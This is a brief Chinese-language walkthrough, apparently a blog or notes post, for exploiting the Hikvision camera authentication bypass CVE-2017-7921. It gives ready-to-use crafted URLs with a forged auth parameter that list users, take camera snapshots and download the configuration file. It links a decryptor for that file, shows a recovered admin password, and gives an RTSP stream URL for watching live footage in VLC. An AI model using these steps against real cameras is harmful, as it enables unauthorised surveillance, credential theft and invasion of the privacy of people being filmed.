海康威视CVE-2017-7921,通过构造url进行检索所有用户、屏幕截图、配置文件下载。
    访问:http://*.*.*.*/Security/users?auth=YWRtaW46MTEK,可列举所有用户
    图片.png
    访问:http://*.*.*.*/onvif-http/snapshot?auth=YWRtaW46MTEK,可获取摄像机快照
    图片.png
    访问:http://*.*.*.*/System/configurationFile?auth=YWRtaW46MTEK,可下载配置文件,下载解码器解码:https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor
    图片.png
    获得登录密码登录admin/hkws123456789
    图片.png
    此处插件下载后,需要使用IE浏览器以兼容性模式打开才可以查看视频。
    小tip:

    可以下载VLC media player,文件-打开网络串流,填入以下格式网络URL: rtsp://admin:12345@x.x.x.x:554/h264/ch1/main/av_stream 就可以查看监控信息了,该方法可以绕过web端不开放的情况。

    图片.png